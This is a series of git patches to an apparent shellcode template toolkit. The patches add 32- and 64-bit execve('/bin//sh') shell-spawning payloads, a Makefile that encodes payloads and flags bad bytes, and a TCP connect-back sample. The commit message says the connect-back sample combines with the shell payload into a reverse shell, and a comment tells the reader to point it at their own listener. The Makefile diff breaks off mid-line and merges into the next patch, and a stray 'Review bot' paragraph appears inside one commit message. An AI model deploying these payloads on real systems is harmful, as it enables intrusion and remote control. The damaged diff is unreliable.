From d1853b2ea3b52cf20d08c428769a2a4fa3bf6b5c Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sat, 24 Dec 2022 07:42:07 -0500
Subject: shellcode: Drop SYS_EXIT samples
Signed-off-by: Malfurious
---
templates/shellcode/exit32.asm | 8 --------
templates/shellcode/exit64.asm | 8 --------
2 files changed, 16 deletions(-)
delete mode 100644 templates/shellcode/exit32.asm
delete mode 100644 templates/shellcode/exit64.asm
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
deleted file mode 100644
index 559c89c..0000000
--- a/templates/shellcode/exit32.asm
+++ /dev/null
@@ -1,8 +0,0 @@
-[SECTION .text]
-global _start
-
-_start:
- xor ebx, ebx
- xor eax, eax
- mov al, 0x1
- int 0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
deleted file mode 100644
index fb899a2..0000000
--- a/templates/shellcode/exit64.asm
+++ /dev/null
@@ -1,8 +0,0 @@
-[SECTION .text]
-global _start
-
-_start:
- xor rdi, rdi
- mov al, 0x3c
- cdq
- syscall
--
cgit v1.2.3
From c41649b5077eb3e0d66043658df8bccbdfef0f1a Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sat, 24 Dec 2022 07:50:44 -0500
Subject: shellcode: Move example code to a new directory
This is mainly done to keep the top working directory (where the Makefile lives) cleaner.
Signed-off-by: Malfurious
---
templates/shellcode/examples/shell32.asm | 15 +++++++++++++++
templates/shellcode/examples/shell64.asm | 16 ++++++++++++++++
templates/shellcode/shell32.asm | 15 ---------------
templates/shellcode/shell64.asm | 16 ----------------
4 files changed, 31 insertions(+), 31 deletions(-)
create mode 100644 templates/shellcode/examples/shell32.asm
create mode 100644 templates/shellcode/examples/shell64.asm
delete mode 100644 templates/shellcode/shell32.asm
delete mode 100644 templates/shellcode/shell64.asm
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
new file mode 100644
index 0000000..5ff2e12
--- /dev/null
+++ b/templates/shellcode/examples/shell32.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ xor edx, edx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
new file mode 100644
index 0000000..2353b6f
--- /dev/null
+++ b/templates/shellcode/examples/shell64.asm
@@ -0,0 +1,16 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ xor rdx, rdx
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
deleted file mode 100644
index 5ff2e12..0000000
--- a/templates/shellcode/shell32.asm
+++ /dev/null
@@ -1,15 +0,0 @@
-[SECTION .text]
-global _start
-
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
- xor ecx, ecx
- xor edx, edx
- push 0xb
- pop eax
- push ecx
- push 0x68732f2f
- push 0x6e69622f
- mov ebx, esp
- int 0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
deleted file mode 100644
index 2353b6f..0000000
--- a/templates/shellcode/shell64.asm
+++ /dev/null
@@ -1,16 +0,0 @@
-[SECTION .text]
-global _start
-
-; https://www.exploit-db.com/shellcodes/47008
-
-_start:
- xor rsi, rsi
- xor rdx, rdx
- push rsi
- mov rdi, 0x68732f2f6e69622f
- push rdi
- push rsp
- pop rdi
- mov al, 0x3b
- cdq
- syscall
--
cgit v1.2.3
From 806f9029d160c5f47f0b49db288f469718424f7b Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sat, 24 Dec 2022 08:02:29 -0500
Subject: shellcode: Update Makefile
This patch brings various improvements to the shellcoding experience:
- There is no longer a hardcoded assembly sample that gets built Although the default was pretty sane, it will be more convenient to experiment, or build more complex shellcodes using a new untracked filename as the main build target: code.asm If code.asm is missing, then as before, it will be created from shell64.asm (the old hard default). The Makefile targets will compile code.* files.
- Hex string generation and bad char detection are improved grep is used to highlight detected bad chars right in place. This entire feature is now implemented directly in the Makefile using a couple command lines, making shelltool deprecated.
- Builtin disassembly Just run 'make disas' instead of manually invoking objdump. The output is also filtered through grep for bad char detection.
- ELF executable is optional Rather than linking an executable all the time, just run 'make elf' when you need it.
Signed-off-by: Malfurious
---
templates/shellcode/Makefile | 38 ++++++++++++++++++++++++++------------
1 file changed, 26 insertions(+), 12 deletions(-)
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
index 2e67adc..757878f 100644
--- a/templates/shellcode/Makefile
+++ b/templates/shellcode/Makefile
@@ -1,17 +1,31 @@
-.PHONY: all
+LDFLAGS?=
+FORMAT?=elf64
+CODE?=examples/shell64.asm
+GREP=00|0a
-all: shell32.elf shell64.elf
- @objdump -d shell32.elf | ./shelltool.py
- @objdump -d shell64.elf | ./shelltool.py
+.PHONY: all elf disas
-shell32.o: shell32.asm
- nasm -f elf shell32.asm -o shell32.o
+# Format bytecode as an escaped string, highlight bad bytes
+all: code.bin
+ @xxd -i -c 16
Date: Sat, 24 Dec 2022 15:25:26 -0500
Subject: shellcode: Remove shelltool
shelltool is now deprecated, made redundant by the updated Makefile.
Signed-off-by: Malfurious
---
templates/shellcode/shelltool.py | 30 ------------------------------
1 file changed, 30 deletions(-)
delete mode 100755 templates/shellcode/shelltool.py
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
deleted file mode 100755
index b95a8cd..0000000
--- a/templates/shellcode/shelltool.py
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env python
-
-# This script will convert shellcode disassembly into an escaped string literal
-# and warn about problematic bytes in the payload.
-# objdump -d elf | ./shelltool.py
-
-import sys
-
-name = None
-bytecode = []
-badchars = [ 0x00, 0x0a ]
-
-for line in sys.stdin:
- for tok in line.split():
- if name is None:
- name = tok
- if len(tok) == 2:
- try:
- bytecode.append(int(tok, base=16))
- except:
- pass
-
-result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
-result = f'{name}"{result}"'
-
-for x in badchars:
- if x in bytecode:
- result += f' **0x{"%02x"%(x)} detected**'
-
-print(result)
--
cgit v1.2.3
From f21e743212f02dbfb560fa74d983a7e156722d11 Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 15 Jan 2023 08:06:42 -0500
Subject: shellcode: Update /bin/sh shellcodes
The shell-spawning shellcodes are rewritten to address the following concerns:
- The array parameters to execve are now set properly, to valid arrays on the stack, instead of NULL pointers.
- The cdq instruction is no longer used to sign-extend the rax register, since it has not been producing the expected results in gdb.
- Labels, sections, and other file metadata are removed in order to support concatenation of shellcode samples to make more complex code.
Signed-off-by: Malfurious
---
templates/shellcode/examples/shell32.asm | 29 ++++++++++++-------------
templates/shellcode/examples/shell64.asm | 36 +++++++++++++++++++-------------
2 files changed, 37 insertions(+), 28 deletions(-)
diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
- xor ecx, ecx
- xor edx, edx
- push 0xb
- pop eax
- push ecx
- push 0x68732f2f
- push 0x6e69622f
- mov ebx, esp
- int 0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor eax, eax
+xor ecx, ecx
+push ecx
+push 0x68732f2f
+push 0x6e69622f
+mov ebx, esp
+push ecx
+mov edx, esp
+push ebx
+mov ecx, esp
+mov al, 11
+int 0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+; ┏━━━━━━━━━━━━━━┓
+; ┃ v
+; [ argv0, NULL ] "/bin//sh" NULL
+; ^ ^ ^
+; ┃ ┃ ┃
+; argv envp filename
-_start:
- xor rsi, rsi
- xor rdx, rdx
- push rsi
- mov rdi, 0x68732f2f6e69622f
- push rdi
- push rsp
- pop rdi
- mov al, 0x3b
- cdq
- syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor rax, rax
+xor rsi, rsi
+mov rdi, 0x68732f2f6e69622f
+push rsi
+push rdi
+mov rdi, rsp
+push rsi
+mov rdx, rsp
+push rdi
+mov rsi, rsp
+mov al, 59
+syscall
--
cgit v1.2.3
From 1418eaf3054967f1d9856279f1988279c1009ba1 Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 15 Jan 2023 09:29:14 -0500
Subject: shellcode: Add sample for connecting a TCP socket
This sample can be used to create a reverse shell when combined with the shell64 sample: cat examples/{tcp64,shell64}.asm >code.asm make ...
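Review bot: The new header comment `; execve("/bin/sh", ["/bin/sh"], [])` in shell32.asm does not match the bytes the code actually pushes: 0x6e69622f followed by 0x68732f2f spell "/bin//sh", which is also what shell64.asm's own stack diagram labels the string as, so the same comment line in the shell64.asm hunk is inaccurate too. Suggest `; execve("/bin//sh", ["/bin//sh"], [])` in both files so the comment, the diagram and the immediates agree. Since this commit strips labels and sections so samples can be concatenated, the raw syscall numbers are now the only metadata left; a trailing comment such as `mov al, 11  ; SYS_execve (i386)` and `mov al, 59  ; SYS_execve (x86-64)` would make the two files self-describing without changing any byte of the output.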
Signed-off-by: Malfurious
---
templates/shellcode/examples/tcp64.asm | 49 ++++++++++++++++++++++++++++++++++
1 file changed, 49 insertions(+)
create mode 100644 templates/shellcode/examples/tcp64.asm
diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+xor rdx, rdx
+mov al, 41
+mov dil, 2
+mov sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in { // Struct size: 16
+; short int sin_family; // AF_INET (2)
+; unsigned short int sin_port; // Set to 8080 below
+; struct in_addr sin_addr; // Set to 127.0.0.1 below
+; unsigned char sin_zero[8];
+; };
+;
+; struct in_addr { // Struct size: 4
+; uint32_t s_addr;
+; };
+xor rbx, rbx
+push rbx
+mov rbx, 0x0100007f901f0002
+push rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov rdi, rax
+mov rsi, rsp
+mov dl, 16
+xor rax, rax
+mov al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor rsi, rsi
+mov al, 33
+syscall
+mov sil, 1
+mov al, 33
+syscall
+mov sil, 2
+mov al, 33
+syscall
--
cgit v1.2.3
From 8037b8c5acaeeeff32d6de01c06132a4f5e432bf Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 15 Jan 2023 09:57:27 -0500
Subject: Ignore shellcode working files
Signed-off-by: Malfurious
---
templates/shellcode/.gitignore | 1 +
1 file changed, 1 insertion(+)
create mode 100644 templates/shellcode/.gitignore
diff --git a/templates/shellcode/.gitignore b/templates/shellcode/.gitignore
new file mode 100644
index 0000000..e9c55fb
--- /dev/null
+++ b/templates/shellcode/.gitignore
@@ -0,0 +1 @@
+code.*
--
cgit v1.2.3